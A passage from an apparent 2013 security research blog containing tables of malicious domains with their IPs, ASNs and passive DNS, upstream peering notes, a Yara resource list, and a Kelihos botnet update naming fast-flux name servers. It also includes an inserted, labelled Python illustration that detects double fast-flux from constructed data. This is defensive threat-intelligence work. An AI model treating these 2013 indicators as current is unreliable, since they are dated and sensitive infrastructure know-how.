<tr> <td><span style="font-family: inherit;">wholists.org </span></td> <td><span style="font-family: inherit;">95.163.104.69 </span></td> <td><span style="font-family: inherit;">AS12695 </span></td> <td><span style="font-family: inherit;">Digital Networks CJSC </span></td></tr>
<tr> <td><span style="font-family: inherit; line-height: 18.5625px;">gettrial.store-apps.org</span></td> <td><span style="font-family: inherit; line-height: 19.984375px;">95.163.104.94</span></td> <td><span style="font-family: inherit;">AS12695 </span></td> <td><span style="font-family: inherit;">Digital Networks CJSC </span></td></tr>
<tr> <td><span style="font-family: inherit; line-height: 19.984375px;">t22.run-stat.org</span></td> <td><span style="font-family: inherit;">95.163.104.69 </span></td> <td><span style="font-family: inherit;">AS12695 </span></td> <td><span style="font-family: inherit;">Digital Networks CJSC </span></td></tr>
<tr> <td><span style="font-family: inherit; line-height: 19.984375px;">seek4.run-stat.org</span></td> <td><span style="font-family: inherit; line-height: 19.984375px;">46.165.230.185</span></td> <td><span style="font-family: inherit;">AS16265</span></td> <td><span style="font-family: inherit;">Leaseweb</span></td></tr>
<tr> <td><span style="font-family: inherit;">bt.ads-runner.org </span></td> <td><span style="font-family: inherit;">208.115.109.53</span></td> <td><span style="font-family: inherit;">AS23033</span></td> <td><span style="font-family: inherit;">Wowrack</span></td></tr>
<tr> <td><span style="font-family: inherit; line-height: 19.984375px;">fw.point-up.org</span></td> <td><span style="font-family: inherit;">85.143.166.221</span></td> <td><span style="font-family: inherit;">AS56534</span></td> <td><span style="font-family: inherit;">PIRIX-CORPNET-2</span></td></tr>
</tbody></table>
<div style="border: 0px; margin: 0px; padding: 0px; text-align: center;">
<span style="font-family: inherit;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="font-family: inherit; font-size: small;">
Passive DNS</span></h3>
<table border="1" cellpadding="5"><tbody>
<tr> <th><span style="font-family: inherit;">95.163.104.69</span></th> <th><span style="font-family: inherit;">95.163.104.94</span></th> <th><span style="font-family: inherit;">46.165.230.185</span></th> <th><span style="font-family: inherit;">208.115.109.53</span></th><th><span style="font-family: inherit;">85.143.166.221</span></th></tr>
<tr> <td><span style="font-family: inherit;">www.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.upsave.info</span></td> <td><span style="font-family: inherit;">ntp.run-stat.org</span></td><td><span style="font-family: inherit;">fw.point-up.org</span></td></tr>
<tr> <td><span style="font-family: inherit;">bns.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.store-apps.org</span></td> <td><span style="font-family: inherit;">fw.stat-run.info</span></td> <td><span style="font-family: inherit;">bt.ads-runner.org</span></td><td><span style="font-family: inherit;">ns2.memrem.ru</span></td></tr>
<tr> <td><span style="font-family: inherit;">gjd.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.games-olympic.org</span></td> <td><span style="font-family: inherit;">fw.run-stat.org</span></td> <td><span style="font-family: inherit;">sk4.ads-runner.org</span></td><td><span style="font-family: inherit;">ns2.nalkanet.ru</span></td></tr>
<tr> <td><span style="font-family: inherit;">lbh.wholists.org</span></td> <td><span style="font-family: inherit;">ns1.googleminiapi.com</span></td> <td><span style="font-family: inherit;">mail.stat-run.info</span></td> <td><span style="font-family: inherit;">ntp.stat-run.info</span></td><td><span style="font-family: inherit;">ns2.nallanite.ru</span></td></tr>
<tr> <td><span style="font-family: inherit;">qdp.wholists.org</span></td> <td><span style="font-family: inherit;">peace.vijproject.com</span></td> <td><span style="font-family: inherit;">bt2.run-stat.org</span></td> <td><span style="font-family: inherit;"><br /></span></td><td><span style="font-family: inherit;">vm.clodoserver.ru</span></td></tr>
<tr> <td><span style="font-family: inherit;">www.techsign.org</span></td> <td><span style="font-family: inherit;">sogood.vitaminavip.com</span></td> <td><span style="font-family: inherit;">jc.upsave.info</span></td> <td><span style="font-family: inherit;"><br /></span></td><td><span style="font-family: inherit;"><br /></span></td></tr>
<tr> <td><span style="font-family: inherit;">ml.inviteyou.info</span></td> <td><span style="font-family: inherit;">img.stat-run.info</span></td> <td><span style="font-family: inherit;">ju.upsave.info</span></td><td><span style="font-family: inherit;"><br /></span></td><td><span style="font-family: inherit;"><br /></span></td></tr>
</tbody></table>
<span style="font-family: inherit;"><br /></span>
<br />
<div style="text-align: center;">
<i><span style="font-family: inherit;">Passive DNS data courtesy of <a href="https://sie.isc.org/About_ISC_Security/">ISC SIE</a></span></i></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><br /></span></div>
<h3 style="text-align: left;">
<span style="font-family: inherit; font-size: small;">
Routing and Peers</span></h3>
<div style="text-align: left;">
<span style="font-family: inherit;">The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers. </span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: left;">
<b><u><span style="font-family: inherit;">95.163.104.69 &amp; 95.163.104.94 - AS12695 - Digital Networks CJSC (DINET)</span></u></b></div>
<div style="text-align: left;">
<span style="font-family: inherit; font-weight: bold; text-align: center;"><br />
</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: right;">
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-left: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJa50gNhSpxJYSahUrAazSz7oGitHCJ_XRhFo915t5ep82Vlu1Lg50csfMuJqInAVmC4UCD6fTmCLn3nBuq2JjjehVIe1T816QffMJ49sPVeuXjz3WlrVpHhJsFfZ9eRgZWqkvofEzPe4/s1600/asn12695_jan2013.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJa50gNhSpxJYSahUrAazSz7oGitHCJ_XRhFo915t5ep82Vlu1Lg50csfMuJqInAVmC4UCD6fTmCLn3nBuq2JjjehVIe1T816QffMJ49sPVeuXjz3WlrVpHhJsFfZ9eRgZWqkvofEzPe4/s320/asn12695_jan2013.png" height="213" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS12695 - January, 2013</span></td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXVgTCnkKyXxKUy_aHRlAx0PCqupjlT2br7GxdOedf-jsSJhAwPqKQZJgFGyFxRIGbMI37PF5EG8L3uwVoVEC489oKKpXFqHnY2MCZ5m6-7gA4hvVt01Q2kpR0os1gifoabLMfBO0rVTU/s1600/asn12695_may2013.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXVgTCnkKyXxKUy_aHRlAx0PCqupjlT2br7GxdOedf-jsSJhAwPqKQZJgFGyFxRIGbMI37PF5EG8L3uwVoVEC489oKKpXFqHnY2MCZ5m6-7gA4hvVt01Q2kpR0os1gifoabLMfBO0rVTU/s320/asn12695_may2013.png" height="213" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS12695 - May, 2013</span></td></tr>
</tbody></table>
<div style="clear: both;"><br /></div>
<div style="text-align: left;">
<span style="font-family: inherit;">In January, we see that for the prefix 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May AS31133 was added.</span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">AS3216 - SOVAM-AS OJSC _Vimpelcom</span><br />
<span style="font-family: inherit;">AS8657 - CPRM PT Comunicacoes S A</span><br />
<span style="font-family: inherit;">AS31133 - MF-MGSM-AS OJSC MegaFon</span><br />
<a href="http://www.cidr-report.org/cgi-bin/as-report?as=as12695&view=2.0"><span style="font-family: inherit;">CIDR Report for AS12695</span></a><br />
<span style="font-family: inherit;"><br /><b><u>208.115.109.53 - AS23033 - WowRack</u></b></span><br />
<span style="font-family: inherit;"><b><u><br />
</u></b> </span><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-left: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgicjEIXK2EOW-jpI7VgiQkmFyIqokLYLve2TxPn-rXH-pntFgpa3hPIX1wczcwUMcBH5tkXFhjWTY52x-2Ny-yu6-nZIVd6U1asK1zu0bb_zEjMeUti3ClcjIckQ1uMan9z6I2CP6o7xs/s1600/asn23033_jan2013.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgicjEIXK2EOW-jpI7VgiQkmFyIqokLYLve2TxPn-rXH-pntFgpa3hPIX1wczcwUMcBH5tkXFhjWTY52x-2Ny-yu6-nZIVd6U1asK1zu0bb_zEjMeUti3ClcjIckQ1uMan9z6I2CP6o7xs/s320/asn23033_jan2013.png" height="213" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS23033 - January, 2013</span></td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDD7DwYBQbBrTrqsz35uvglRJ0zNziZgzU1MwtUumFKmYHlvD4ivlUmxkiG_hTa22X7Du-WD7z66mhNuFAfoIRR3c6yaVwEfSl0WZ3CGldqWtHlokByQMaC-VeDnd40jU1lMvpQOWH6UM/s1600/asn23033_may2013.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDD7DwYBQbBrTrqsz35uvglRJ0zNziZgzU1MwtUumFKmYHlvD4ivlUmxkiG_hTa22X7Du-WD7z66mhNuFAfoIRR3c6yaVwEfSl0WZ3CGldqWtHlokByQMaC-VeDnd40jU1lMvpQOWH6UM/s320/asn23033_may2013.png" height="213" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS23033 - May, 2013</span></td></tr>
</tbody></table>
<span style="font-family: inherit;">For the prefix 208.115.109.0/24, WowRack's primary upstream is AS11404 (AS-VOBIZ, vanoppen.biz LLC).</span><br />
<a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS23033&view=2.0"><span style="font-family: inherit;">CIDR Report for AS23033</span></a><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<b><u><span style="font-family: inherit;">85.143.166.221 - AS56534 - PIRIX-CORPNET-2</span></u></b><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-left: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqBASAgxPCvukuaIrwQ4xQaJWbwS33SJBSWxyBMRT_PiwVuAaMUh3mKvnHkJ-XLGRmbCXb-ratSC4xq_wQmJyYSHPeyhAFUYYvDIL-Emf1vMblQHIV2tpKhMLfJYBP-KRF6i1wbe0J0rU/s1600/asn56534_jan2013.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqBASAgxPCvukuaIrwQ4xQaJWbwS33SJBSWxyBMRT_PiwVuAaMUh3mKvnHkJ-XLGRmbCXb-ratSC4xq_wQmJyYSHPeyhAFUYYvDIL-Emf1vMblQHIV2tpKhMLfJYBP-KRF6i1wbe0J0rU/s320/asn56534_jan2013.png" height="260" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS56534 - January, 2013</span></td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihvffWzumuk0JiVv5kPd9jVZi4VeZlLMCQAJY1imh99mIj_GukOJqUSVBeogXGiSvjfGh9cWFMZiCyRx_JEqfx5TZrRWIGYSq6gVjqIlK-4ltsLuak-sD3F22RlWsdfD7D5MP6Tg9VnAA/s1600/asn56534_may2013.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihvffWzumuk0JiVv5kPd9jVZi4VeZlLMCQAJY1imh99mIj_GukOJqUSVBeogXGiSvjfGh9cWFMZiCyRx_JEqfx5TZrRWIGYSq6gVjqIlK-4ltsLuak-sD3F22RlWsdfD7D5MP6Tg9VnAA/s320/asn56534_may2013.png" height="260" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">Peering for AS56534 - May, 2013</span></td></tr>
</tbody></table>
<span style="font-family: inherit;">In January, for the prefix 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">AS9002 - ReTN.net </span><br />
<span style="font-family: inherit;">AS3267 - RUNNET</span><br />
<span style="font-family: inherit;">AS50384 - W-IX_LTD</span><br />
<a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS56534&view=2.0"><span style="font-family: inherit;">CIDR Report for AS56534</span></a><br />
<span style="font-family: inherit;"><br /></span>
<br />
<span style="font-family: inherit;">DeepEnd Research will continue to report our findings and analysis of the malware and hosting infrastructure pertaining to CMS exploits. We are also working with victim organizations on any successful compromises we detect. </span><br />
<span style="font-family: inherit;"><br />
Please feel free to contact us directly if you have anything you'd like to share, or if you would like further information from us.</span></div>
</div>
</div>
Andre M. DiMino (http://www.blogger.com/profile/07255414624107506662)<br />
<b>Yara Resources</b> (published 2013-02-25, updated 2013-08-16)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9eSm17CPP_3TFBmeMzFLMybSWwahMG_L0vGxrnnG1itX6JYCschPkA5d-vBLru9Z02vkQmyOfValLmWdobj3IaGCfiKsYreRv0JGu2MgM1VJ2-xUaIDHS9x5UZn99hrONRNLSvt_5sXkU/s1600/yara.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9eSm17CPP_3TFBmeMzFLMybSWwahMG_L0vGxrnnG1itX6JYCschPkA5d-vBLru9Z02vkQmyOfValLmWdobj3IaGCfiKsYreRv0JGu2MgM1VJ2-xUaIDHS9x5UZn99hrONRNLSvt_5sXkU/s1600/yara.PNG" /></a><br />
<br />
<b><a href="https://code.google.com/p/yara-project/">Yara Project by Víctor Manuel Álvarez </a> </b><br />
<br />
<b><a href="http://www.deependresearch.org/2012/08/yara-signature-exchange-google-group.html">Yara Exchange Google Group</a> </b>- exchange Yara signatures, tools, resources, and ideas. 170+ members as of Feb. 2013<br />
<br />
<b>Notable Yara related publications by date:</b><br />
<ul>
<li>2013-08 <a href="http://yaragenerator.com/">http://yaragenerator.com/</a> YaraGenerator is an open-source toolset which allows for quick, effective, and automatic YARA signature creation from a number of malicious file types (executables, Office, PDF, Java, HTML, and more)</li>
<li>2013-02 <a href="http://sourceforge.net/projects/mastiff/?source=navbar">MASTIFF with Yara Plugin</a> by Klayton Monroe and Tyler Hudak. MASTIFF is a static analysis framework that automates the process of extracting key characteristics from a number of different file formats. </li>
<li>2013-02 <a href="http://www.youtube.com/watch?v=mxGnjTlufAA&feature=youtu.be">Using Cuckoobox, Yara, Volatility and Hopper Disassembler to analyze APT1 malware</a> by Chort Z. Row</li>
<li>2013-01 <a href="http://rants.effu.se/2013/01/Installing-Latest-Yara-That-Works-With-Automake-1.11">Installing Latest Yara That Works With Automake-1.11</a> (Yara v1.7) by Chort</li>
<li>2013-01 <a href="http://resources.infosecinstitute.com/yara/">Yara – Rule-based malware detection and analysis </a>by Dejan Lukan </li>
<li>2013-01 <a href="https://github.com/MITRECND/yaraprocessor">Yaraprocessor</a> by Stephen DiCato (MITRE). Yaraprocessor allows you to scan data streams in a few unique ways, including scanning a stream in discrete chunks or buffers. </li>
<li>2013-01 <a href="https://github.com/MITRECND/chopshop/blob/master/README.md">ChopShop</a> ChopShop is a MITRE developed framework to aid analysts in the creation and execution of pynids based decoders and detectors of APT tradecraft.</li>
<li>2013-02 <a href="http://www.securityflux.com/?p=98">Working with Yara.</a> Security Flux </li>
<li>2013-02 <a href="http://labs.alienvault.com/labs/index.php/tag/yara/">Yara Rules for APT1/Comment Crew malware arsenal</a></li>
<li>2013-01 <a href="https://github.com/hiddenillusion">Yara-goodies </a>by Hiddenillusion </li>
<li>2012-12 <a href="https://code.google.com/p/yara-editor/">Yara Editor</a> by Ivan Fontarensky</li>
<li>2012 <a href="https://code.google.com/p/malware-lu/source/browse/">Malware.lu Yara signatures for some malware samples</a></li>
<li>2012-10 <a href="https://github.com/aol/moloch">Moloch by AOL team</a> Moloch is an IPv4 packet capturing (PCAP), indexing and database system. A simple web interface is provided for PCAP browsing, searching, and exporting. Moloch is not meant to replace IDS engines but to work alongside them, storing and indexing all network traffic in standard PCAP format for fast access. Moloch is built to be deployed across many systems and can scale to handle multiple gigabits/sec of traffic</li>
<li>2012-12 <a href="https://github.com/jaimeblasco/AlienvaultLabs/commits/master/peid2yar">Peid signatures converted to Yara signatures</a> by AlienVault</li>
<li>2012-12 <a href="http://www.ossir.org/paris/supports/2012/2012-12-11/Saad_Kadhi-FBMWIAY-OSSIR_Paris-20121211.pdf">Fighting Back Malware with IOC &amp; Yara</a> by Saâd Kadhi, OSSIR Paris, 2012-12-11</li>
<li>2012-12 <a href="https://github.com/ApoNie/G-Yara">G-Yara - a Web based (PHP) yara rule editor</a>. It's a handy way to test yara rules as you write them.</li>
<li>2012-11 <a href="http://blog.sei.cmu.edu/post.cfm/writing-effective-yara-signatures-to-identify-malware">Writing Effective YARA Signatures to Identify Malware</a> by David French</li>
<li>2012-10 <a href="https://github.com/chrislee35/yara-normalize/blob/master/README.rdoc">Yara-normalize</a> by Chris Lee. Normalizes Yara Signatures into a repeatable hash even when non-transforming changes are made. </li>
<li>2012-10 <a href="https://github.com/sroberts/peid4yara">Peid4yara is the conversion of the PEiD signatures to work with the active Yara malware classifier</a></li>
<li>2012-10 <a href="https://github.com/jaimeblasco/AlienvaultLabs/blob/master/yarad/README.md">Yarad and Pyarad</a> - Yarad deploys a server that can be used to scan files and streams centrally with Yara and your own ruleset. Pyarad allows you to interact with the yarad server from your Python scripts. AlienVault Labs</li>
<li>2012-10 <a href="https://github.com/Xen0ph0n/MIDAS">MIDAS Metadata Inspection Database Alerting System</a>. A project to automate the inspection and databasing of all metadata contained in files destined for an organization (generally by dumping the files attached to emails with YARA, but it could also be automated via NetWitness or another full-pcap tool, or simply by iterating through file servers looking for suspicious files). Alternatively, it can be used to look for heuristic anomalies in existing collections of files, both malicious and benign.</li>
<li>2012-08 <a href="http://www.youtube.com/watch?feature=player_embedded&v=CvGgqyfySDM#!">Create YARA Signature Demonstration video of the CreateYaraSignature.py </a></li>
<li>2012-08 <a href="http://blog.accuvantlabs.com/blog/case-b/making-ida-1-part-one-%E2%80%93-yara-signature-creation-1">Yara Signature Creation with IDA</a> by Case Barnes from AccuvantLabs</li>
<li>2012-07 <a href="http://code.google.com/p/volatility/wiki/CommandReferenceMal23#yarascan">Yarascan plugin for Volatility Framework</a></li>
<li>2012-04 <a href="http://joxeankoret.com/blog/2012/04/29/extracting-binary-patterns-in-malware-sets-and-generating-yara-rules/">Extracting Binary patterns in malware sets</a> (useful tool, but it has limitations on the number of files it will process and does not take into account the role of the matching bytes that files share)</li>
<li>2011-04 <a href="http://0xdabbad00.com/2011/04/23/creating-a-yara-signature-for-shellcode/">Creating a Yara Signature for Shellcode </a></li>
<li>2011 <a href="http://my.safaribooksonline.com/book/networking/security/9780470613030/malware-classification/classification_with_yara">Converting ClamAV signatures for Yara</a> Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code Recipe 3-3 </li>
<li>2011-08 <a href="https://github.com/SpiderLabs/yara-ruby/blob/master/README.rdoc">Ruby bindings for the yara malware analysis library. Eric Monti</a></li>
<li>2011-12 <a href="https://github.com/fygrave/c_icap_yara">Yara C-ICAP Server Module</a> by Fyodor Grave </li>
<li>2011-01 <a href="http://hooked-on-mnemonics.blogspot.com/2011/01/intro-to-creating-anti-virus-signatures.html">An Intro to Creating Anti-Virus Signatures</a> by Alexander Hanel </li>
<li>2011-11 <a href="http://blog.zeltser.com/post/4339793582/custom-signatures-for-malware-scan">Tools to scan the file system with custom malware signatures</a> by Lenny Zeltser </li>
<li>2010 <a href="https://code.google.com/p/yara-project/downloads/list">UltraEdit and TextMate code highlighting bundles for Yara </a></li>
<li>2009 <a href="http://www.cutawaysecurity.com/blog/scout-sniper">Scout Sniper (scoutsniper)</a> is a wrapper program for the Yara malware identification and classification tool and the Fuzzy Hashing program ssdeep. scoutsniper is designed to run all of the files in a designated directory against a designated Yara Rule file or ssdeep’s Fuzzy dynamic linked library (fuzzy.dll).</li>
<li>2009 <a href="http://windowsir.blogspot.com/2009/01/got-your-yara.html">Got your YARA??</a> Windows Incident Response blog</li>
</ul>
</div>
Mila Parkour (http://www.blogger.com/profile/05026389826489033821)<br />
<b>Trojan Nap aka Kelihos/Hlux - Feb. 2013 Status Update</b> (published 2013-02-10, updated 2013-02-12)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8EsSTHebpewbaizIN7WKa1HD7lCVDF2z1Hldm-_p0wVyWt50V8TRfolCKwo4yeHPhssuoWad9QhobokAQ9RoEX8sjPH1MEgILdLt8muAV243ffrcdjGkzGCMxxFJC7PsJVoeLvu8ZkL0n/s1600/kel.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8EsSTHebpewbaizIN7WKa1HD7lCVDF2z1Hldm-_p0wVyWt50V8TRfolCKwo4yeHPhssuoWad9QhobokAQ9RoEX8sjPH1MEgILdLt8muAV243ffrcdjGkzGCMxxFJC7PsJVoeLvu8ZkL0n/s200/kel.PNG" width="193" /></a></div>
<b>Update Feb 11, 2013, regarding media headlines calling this a "new version": </b><br />
<i>Please note that this post is a "status update" on the growth of the Kelihos botnet. It is the same botnet and malware as we saw last year. The goal of the post is to highlight the rapid re-growth after the March 2012 takedown and share the recent known domain/name server data.</i><br />
<br />
FireEye posted details about the sleep function found in Kelihos/Hlux (<a href="http://blog.fireeye.com/research/2013/02/an-encounter-with-trojan-nap.html">An encounter with Trojan Nap</a>), which is interesting and indeed present in some of the samples we saw. The trojan of course has many more features, most of them documented in previous publications online. This post is a quick update on the state of the Kelihos/Hlux botnet, along with the list of known fast flux domains (1500+) associated with Kelihos distribution or command and control, covering 2012 to the present. The current and most active name servers point to ns[1-6].boomsco.com, ns[1-6].larstor.com, and ns[1-6].zempakiv.ru, which are themselves fast flux domains. This double fast flux arrangement, in which both the malware domains and the name servers they delegate to keep rotating their addresses, makes the botnet very difficult to take down, and sinkholing is only a temporary measure. Despite the two large takedown attempts (Sep. 2011 and Mar. 2012), the botnet is definitely on the rise again. </div>
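What "double fast flux" looks like in resolver data, as an added illustration that is not part of the original post and uses no data from the actual Kelihos infrastructure: a domain is scored as fluxing when its A answers churn through many addresses spread over several networks at short TTLs, and as double-fluxing when the hosts its NS records delegate to show the same churn. The thresholds (5 addresses, 3 distinct /16s, TTL of 600 s or less), the use of /16 prefixes as an offline stand-in for ASN diversity, and every name and address (constructed in documentation and benchmark ranges) are assumptions made for this example.

```python
from dataclasses import dataclass
from ipaddress import ip_network
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Observation:
    """One resource record seen in a resolver/passive-DNS log (constructed here)."""
    t: int        # seconds since the start of the capture window
    name: str     # queried name
    rtype: str    # "A" or "NS"
    rdata: str    # address for A, host name for NS
    ttl: int


def _net16(ip: str) -> str:
    # /16 is an offline stand-in for ASN diversity (assumption for this
    # example; production code would map each address to its origin AS).
    return str(ip_network(f"{ip}/16", strict=False))


def flux_stats(obs: List[Observation], name: str) -> Dict[str, Optional[int]]:
    """Churn statistics for one name's A records over the capture window."""
    a = [o for o in obs if o.name == name and o.rtype == "A"]
    return {
        "answers": len(a),
        "ips": len({o.rdata for o in a}),
        "nets": len({_net16(o.rdata) for o in a}),
        "min_ttl": min((o.ttl for o in a), default=None),
    }


def is_fluxing(stats, min_ips: int = 5, min_nets: int = 3, max_ttl: int = 600) -> bool:
    """Thresholds are assumptions for this example: many addresses, spread
    over several networks, advertised with short TTLs so clients re-resolve."""
    return (
        stats["ips"] >= min_ips
        and stats["nets"] >= min_nets
        and stats["min_ttl"] is not None
        and stats["min_ttl"] <= max_ttl
    )


def classify(obs: List[Observation], domain: str) -> str:
    """'double-flux' when the domain's A records flux and so do those of every
    name server it delegates to; 'single-flux' when only the domain's do."""
    ns_hosts = sorted({o.rdata for o in obs if o.name == domain and o.rtype == "NS"})
    domain_flux = is_fluxing(flux_stats(obs, domain))
    ns_flux = [is_fluxing(flux_stats(obs, ns)) for ns in ns_hosts]
    if domain_flux and ns_hosts and all(ns_flux):
        return "double-flux"
    if domain_flux:
        return "single-flux"
    return "stable"


def _rotating(name: str, ips: List[str], ttl: int, queries: int, per_answer: int = 2) -> List[Observation]:
    """Constructed log: each query (one TTL apart) returns `per_answer`
    addresses, walking through `ips` so the set seen grows over time."""
    return [
        Observation(q * ttl, name, "A", ips[(q * per_answer + k) % len(ips)], ttl)
        for q in range(queries)
        for k in range(per_answer)
    ]


# Constructed addresses in documentation/benchmark ranges; no real infrastructure.
FLUX_IPS = ["198.51.100.7", "203.0.113.40", "192.0.2.19", "198.51.100.200",
            "203.0.113.9", "192.0.2.77", "198.18.5.4", "198.18.77.1"]
NS_IPS = ["198.51.100.33", "203.0.113.120", "192.0.2.250",
          "198.51.100.90", "203.0.113.66", "192.0.2.8"]

OBSERVATIONS: List[Observation] = (
    # domain and both of its name servers rotate: the double-flux pattern
    [Observation(0, "flux.example", "NS", "ns1.flux.example", 300),
     Observation(0, "flux.example", "NS", "ns2.flux.example", 300)]
    + _rotating("flux.example", FLUX_IPS, 300, 6)
    + _rotating("ns1.flux.example", NS_IPS, 300, 6)
    + _rotating("ns2.flux.example", NS_IPS[::-1], 300, 6)
    # domain rotates but is served by a conventional, static name server
    + [Observation(0, "single.example", "NS", "ns.hoster.example", 3600)]
    + _rotating("single.example", FLUX_IPS, 120, 6)
    + _rotating("ns.hoster.example", ["192.0.2.1"], 86400, 6)
    # ordinary host: one address, long TTL
    + _rotating("static.example", ["203.0.113.5"], 86400, 6)
)

if __name__ == "__main__":
    for d in ("flux.example", "single.example", "static.example"):
        print(d, flux_stats(OBSERVATIONS, d), classify(OBSERVATIONS, d))
```

The NS check is the part that matters for the takedown problem described above: sinkholing or suspending the A records of the malware domains leaves a fluxing NS layer free to repoint them, which is why the post treats sinkholing as temporary.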
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>Previously published research about Kelihos</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Feb. 2013 - <a href="http://blog.fireeye.com/research/2013/02/an-encounter-with-trojan-nap.html">An encounter with Trojan Nap - Fireeye</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Feb. 2013 - <a href="http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/backdoorwin32kelihos-trojanwin32genericbt">Backdoor.Win32. Kelihos - Lavasoft Analysis</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Jan. 2013 - <a href="http://www.symantec.com/connect/fr/blogs/waledac-gets-cozy-virut">Waledac Gets Cozy with Virut - Symantec (Symantec calls Kelihos "Waledac (Kelihos)")</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Jan. 2013 - <a href="http://webcache.googleusercontent.com/search?q=cache:PwRwzhquo5wJ:portableapps.com/node/36169+&cd=2&hl=en&ct=clnk&gl=us">Beware of Kelihos-2? - Portable Apps</a> member note</span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Dec. 2012 - <a href="http://www.abuse.ch/?p=4878">A Quick Update On Spambot Kelihos - abuse.ch</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Mar. 2012 - <a href="http://www.honeynet.org/node/833">Kelihos.B/Hlux.B botnet takedown - Honeynet Project </a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Mar. 2012 - <a href="http://www.securelist.com/en/blog/208193431/Botnet_Shutdown_Success_Story_again_Disabling_the_new_Hlux_Kelihos_Botnet">Botnet Shutdown Success Story - again: Disabling the new Hlux/Kelihos Botnet</a> - Securelist</span></div>
<div style="text-align: left;">
